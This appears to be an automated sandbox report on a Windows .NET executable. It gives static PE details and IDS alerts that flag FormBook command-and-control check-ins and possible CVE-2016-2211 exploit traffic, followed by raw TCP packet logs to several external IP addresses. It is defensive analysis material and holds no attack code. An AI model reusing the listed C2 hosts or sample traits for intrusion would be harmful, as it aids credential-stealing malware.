                                                                                                                                  TLSH:82E4238433D80E3DC83F4B7A7D751D801796883F055CEBAE7EA8556DB32976208E4E62
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....00...............0..N...........m... ........@.. ....................................@................................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4a6d16
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x9A3030A7 [Fri Dec 22 09:17:27 2051 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa6cc10x4f.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x628.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xa54140x70.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x20000xa4d1c0xa4e006201b8c64a6da9d4754cb33ed5512aefFalse0.9850916887793784data7.986248350186217IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0xa80000x6280x800018cf8030e498e7ab873aa4e12f8da75False0.33740234375data3.466914278526347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0xaa0000xc0x2002f166bdbf531cce901689f1ce442f9b9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_VERSION0xa80900x398OpenPGP Public Key0.41630434782608694
                                                                                                                                  RT_MANIFEST0xa84380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-11-07T12:52:20.161258+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449735TCP
                                                                                                                                  2024-11-07T12:52:59.013477+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449741TCP
                                                                                                                                  2024-11-07T12:52:59.455958+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974285.159.66.9380TCP
                                                                                                                                  2024-11-07T12:53:23.159013+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44985691.184.0.20080TCP
                                                                                                                                  2024-11-07T12:53:36.833853+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449933194.9.94.8580TCP
                                                                                                                                  2024-11-07T12:53:50.577710+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450010170.39.213.4380TCP
                                                                                                                                  2024-11-07T12:54:04.125673+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002313.248.169.4880TCP
                                                                                                                                  2024-11-07T12:54:18.690356+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002738.47.232.19480TCP
                                                                                                                                  2024-11-07T12:54:32.265623+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450031167.172.133.3280TCP
                                                                                                                                  2024-11-07T12:54:45.843997+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450035162.0.211.14380TCP
                                                                                                                                  2024-11-07T12:55:07.834225+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450039162.241.85.9480TCP
                                                                                                                                  2024-11-07T12:55:21.250769+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500433.33.130.19080TCP
                                                                                                                                  2024-11-07T12:55:34.666154+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500473.33.130.19080TCP
                                                                                                                                  2024-11-07T12:55:48.345102+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450051188.114.97.380TCP
                                                                                                                                  2024-11-07T12:56:01.747068+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500553.33.130.19080TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 7, 2024 12:52:58.503770113 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:58.508783102 CET804974285.159.66.93192.168.2.4
                                                                                                                                  Nov 7, 2024 12:52:58.508879900 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:58.571275949 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:58.576239109 CET804974285.159.66.93192.168.2.4
                                                                                                                                  Nov 7, 2024 12:52:59.414334059 CET804974285.159.66.93192.168.2.4
                                                                                                                                  Nov 7, 2024 12:52:59.455957890 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:59.568556070 CET804974285.159.66.93192.168.2.4
                                                                                                                                  Nov 7, 2024 12:52:59.568712950 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:59.570106030 CET4974280192.168.2.485.159.66.93
                                                                                                                                  Nov 7, 2024 12:52:59.575001001 CET804974285.159.66.93192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:14.647910118 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:14.652791023 CET804981091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:14.653029919 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:14.669486046 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:14.674371958 CET804981091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:15.472966909 CET804981091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:15.518352032 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:15.585941076 CET804981091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:15.586178064 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:16.174797058 CET4981080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:17.194118023 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:17.199582100 CET804982591.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:17.199749947 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:17.210393906 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:17.215275049 CET804982591.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:18.050215960 CET804982591.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:18.096544981 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:18.161761045 CET804982591.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:18.161844969 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:18.721652031 CET4982580192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:19.740298986 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:19.745413065 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.745551109 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:19.756978989 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:19.762023926 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762038946 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762051105 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762059927 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762083054 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762092113 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762101889 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762111902 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:19.762362003 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:20.570370913 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:20.612159014 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:20.682969093 CET804984091.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:20.683118105 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:21.269172907 CET4984080192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:22.287837982 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:22.292968035 CET804985691.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:22.293087006 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:22.300291061 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:22.305187941 CET804985691.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:23.110702991 CET804985691.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:23.159013033 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:23.223407984 CET804985691.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:23.223575115 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:23.224437952 CET4985680192.168.2.491.184.0.200
                                                                                                                                  Nov 7, 2024 12:53:23.229319096 CET804985691.184.0.200192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:28.355248928 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:28.360387087 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:28.360465050 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:28.372756004 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:28.377923965 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231208086 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231224060 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231231928 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231241941 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231249094 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231257915 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.231324911 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:29.231354952 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:29.367885113 CET8049888194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:29.368050098 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:29.877931118 CET4988880192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:30.898333073 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:30.903434038 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:30.903559923 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:30.915663004 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:30.920496941 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750181913 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750207901 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750221968 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750233889 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750252008 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750267982 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:31.750273943 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.750294924 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:31.750336885 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:31.870959044 CET8049903194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:31.871098995 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:32.424801111 CET4990380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.443422079 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.448402882 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.448554039 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.459759951 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:33.466234922 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466247082 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466335058 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466345072 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466353893 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466361046 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466370106 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466468096 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:33.466638088 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461174965 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461189985 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461204052 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461215973 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461226940 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461277008 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461281061 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461313009 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461313963 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461354017 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.461442947 CET8049917194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:34.461487055 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:34.971582890 CET4991780192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:35.990400076 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:35.995429039 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:35.995593071 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.002794981 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.007766962 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833479881 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833610058 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833621025 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833668947 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833678961 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833692074 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.833853006 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.833853006 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.954579115 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:36.954713106 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.955600023 CET4993380192.168.2.4194.9.94.85
                                                                                                                                  Nov 7, 2024 12:53:36.960408926 CET8049933194.9.94.85192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.317594051 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.323355913 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.323458910 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.334391117 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:42.339217901 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.925740957 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.927076101 CET8049963170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:42.927125931 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:43.846575975 CET4996380192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.865133047 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.870426893 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:44.870524883 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.881557941 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:44.886569977 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.465450048 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.466540098 CET8049978170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:45.466593981 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:46.393454075 CET4997880192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.412075043 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.417007923 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.417607069 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.428281069 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:47.433150053 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433167934 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433176994 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433185101 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433202028 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433209896 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433217049 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433265924 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:47.433285952 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.013895988 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.014995098 CET8049994170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:48.017570972 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:48.940351963 CET4999480192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.961582899 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.966869116 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:49.971592903 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.977607012 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:49.982659101 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.574702024 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.575670958 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:50.577709913 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:50.581552029 CET5001080192.168.2.4170.39.213.43
                                                                                                                                  Nov 7, 2024 12:53:50.587296009 CET8050010170.39.213.43192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:55.613395929 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.618232012 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:55.618315935 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.636496067 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:55.641621113 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:56.318183899 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:56.321585894 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:57.143513918 CET5002080192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:57.148441076 CET805002013.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.162117958 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.167084932 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.169670105 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.181579113 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:58.186970949 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.873285055 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:53:58.873702049 CET5002180192.168.2.413.248.169.48
